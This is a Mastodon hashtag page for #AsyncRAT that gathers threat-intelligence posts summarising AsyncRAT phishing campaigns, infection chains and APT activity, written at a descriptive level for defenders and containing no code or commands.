Create accountLogin

Recent searches

No recent searches

Search options

Only available when logged in.
mstdn.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
A general-purpose Mastodon server with a 500 character limit. All languages are welcome.

Administered by:

Server stats:

14K
active users

mstdn.social: AboutStatusProfiles directoryPrivacy policy

Mastodon: AboutGet the appKeyboard shortcutsView source codev4.3.8

#AsyncRAT

1 post1 participant0 posts today
Public
OTX Bot

Detecting Multi-Stage Infection Chains Madness

This analysis examines a complex multi-stage attack exploiting a resilient network infrastructure known as 'Cloudflare tunnel infrastructure to deliver multiple RATs' since February 2024. The infection chain involves multiple steps, including phishing emails with malicious attachments, execution of various file types (LNK, HTA, BAT, Python scripts), and eventual delivery of AsyncRAT. The attackers employ various evasion techniques and leverage public services like TryCloudflare and DynDNS. The report highlights the importance of combining cyber threat intelligence with detection rules to enhance security capabilities against evolving threats. It also provides detailed information on the attack stages, detection opportunities, and associated indicators of compromise.

Pulse ID: 68076448a507880b9128c2a6
Pulse Link: otx.alienvault.com/pulse/68076
Pulse Author: AlienVault
Created: 2025-04-22 09:41:28

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

LevelBlue Open Threat ExchangeLevelBlue - Open Threat ExchangeLearn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.
#AsyncRAT#Cloud#CyberSecurity
Public
OTX Bot

Phishing campaign impersonates Booking.com, delivers a suite of credential-stealing malware

A phishing campaign targeting organizations in the hospitality industry has been identified, impersonating Booking.com and using the ClickFix social engineering technique to deliver multiple credential-stealing malware. The campaign, tracked as Storm-1865, targets individuals likely to work with Booking.com in North America, Oceania, Asia, and Europe. The attack uses fake emails and webpages to trick users into executing malicious commands, leading to the download of various malware families including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. The campaign aims to steal financial data and credentials for fraudulent use, showing an evolution in the threat actor's tactics to bypass conventional security measures.

Pulse ID: 67fb93e8ebc93d6ded395f39
Pulse Link: otx.alienvault.com/pulse/67fb9
Pulse Author: AlienVault
Created: 2025-04-13 10:37:28

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

LevelBlue Open Threat ExchangeLevelBlue - Open Threat ExchangeLearn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.
#Asia#AsyncRAT#CyberSecurity
Public
ESET Research

#ESETresearch has uncovered the #MirrorFace Operation AkaiRyū, which extends the group’s usual focus beyond Japan into Europe. The initial lure centered around Expo 2025 in Japan, compromising a Central European diplomatic institute.
welivesecurity.com/en/eset-res

Surprisingly, #MirrorFace used #ANEL – a backdoor historically linked only to #APT10 – highlighting a shift in the group’s tactics and reinforcing suspicions that MirrorFace could be part of the APT10 umbrella.
Operation AkaiRyū began with targeted spearphishing emails referencing the victim’s past correspondence and Expo 2025 , persuading recipients to download malicious attachments.
Once the files were opened, a layered compromise chain ensued . Collaborating with the victim allowed us to perform in-depth analysis, shedding light on MirrorFace’s post-compromise behavior – from credential harvesting to dropping additional tools for lateral movement.

#MirrorFace used an intricate execution chain to stealthily run a highly tweaked #AsyncRAT within #WindowsSandbox, hampering detection efforts. This is the first time we’ve seen MirrorFace employ AsyncRAT.
In another twist, #MirrorFace utilized #VSCode remote tunnels, a tactic enabling covert access and command execution on compromised machines. This approach has also been seen with other China-aligned cyberespionage groups.
The group primarily leveraged #ANEL as a first-stage backdoor, #HiddenFace – MirrorFace’s flagship backdoor – was dropped later in the attack to bolster persistence . Notably absent this time was #LODEINFO, which #MirrorFace typically employs.

We presented our findings about Operation AkaiRyū conducted by #MirrorFace at @jpcert_ac on January 22, 2025: jsac.jpcert.or.jp.
IoCs available in our GitHub repo: github.com/eset/malware-ioc/tr

Public
nemo™ 🇺🇦

A new campaign, dubbed Desert Dexter, is targeting the Middle East & North Africa, impacting ~900 victims since fall '24! 😱 They're using social media & altered AsyncRAT malware to steal data & crypto. Watch out for malicious ads & file-sharing links! ⚠️ #cybersecurity #malware #AsyncRAT #DesertDexter #newz

thehackernews.com/2025/03/dese

The Hacker NewsDesert Dexter Targets 900 Victims Using Facebook Ads and Telegram Malware LinksA new AsyncRAT malware variant has infected 900 victims in MENA via Facebook ads and Telegram links.
Public
Just Another Blue Teamer

Happy Friday everyone!

I feel like this has become a weekly PSA but Kaspersky Securelist researchers have identified hundreds of #GitHub projects that are serving up malicious code designed to steal saved credentials, cryptocurrency wallets, and browsing history. Sometimes this execution of code leads to the #ASyncRAT or #Quasar Backdoor, but the threat remains the same: blindly executing code from GitHub. I hope you enjoy and Happy Hunting!

The GitVenom campaign: cryptocurrency theft using GitHub

securelist.com/gitvenom-campai

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Kaspersky · The GitVenom campaign: cryptocurrency theft using GitHubBy Georgy Kucherin
Public
Just Another Blue Teamer

Happy Wednesday everyone!

The #AsyncRAT is made headlines in a report published by the Forcepoint X-Labs research team. A significant finding was that the malware leveraged payloads delivered through suspicious TryCloudflare quick tunnels and Python packages. While I am familiar with Python packages being weaponized during a supply chain attack, the topic of quick tunnels eluded me. So, I looked it up and found that "Developers can use the TryCloudflare tool to experiment with Cloudflare Tunnel without adding a site to Cloudflare's DNS. TryCloudflare will launch a process that generates a random subdomain on trycloudflare.com. Requests to that subdomain will be proxied through the Cloudflare network to your web server running on localhost." [developers.cloudflare.com/clou]

This was interesting as it seemed to be a workaround or possibly a replacement for domain generating algorithms (DGAs). And if I am misunderstanding this technology, someone please enlighten me!

Behaviors:
Initial Access:
Phishing: Spearphising Link - T1566.002

Execution:
Command And Scripting Interpreter: JavaScript - T1059.007
- A javascript was executed after an LNK file was delivered and executed and links to a .BAT file.

Command And Scripting Interpreter: Windows Command Shell - T1059.003
- A .BAT file is executed that leads to another zip file that contains a python script used to execute the AsyncRAT malware.

Command And Scripting Interpreter: Python - T1059.006
- A python file is used to execute the AsyncRAT malware.

As usual, go show the authors some love and check out the details I excluded and get hunting on those behaviors! Enjoy and Happy Hunting!

AsyncRAT Reloaded: Using Python and TryCloudflare for Malware Delivery Again
forcepoint.com/blog/x-labs/asy

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Cloudflare DocsQuick Tunnels · Cloudflare Zero Trust docsDevelopers can use the TryCloudflare tool to experiment with Cloudflare Tunnel without adding a site to Cloudflare's DNS. TryCloudflare will launch a process that generates a random subdomain on trycloudflare.com. Requests to that subdomain will be proxied through the Cloudflare network to your web server running on localhost.
Public
Guardians Of Cyber

🚨 Did you know that cybercriminals are now using Bitbucket to distribute Remote Access Trojans like AsyncRAT? 🚨

Attackers are exploiting trusted code-sharing platforms to hide their malicious payloads in plain sight. By hosting malware on Bitbucket, they leverage its legitimacy to bypass security defenses!

🛡️ Cybersecurity Tip: Monitor unexpected downloads from code repositories like Bitbucket. Even reputable platforms can harbor threats if used maliciously.

What are your thoughts on attackers misusing legitimate platforms for cybercrime? Have you ever encountered suspicious repositories?

Learn how AsyncRAT is exploiting Bitbucket and what you can do to protect yourself: guardiansofcyber.com/cybersecu

#Cybersecurity#GuardiansOfCyber#Guardians
ExploreLive feeds
About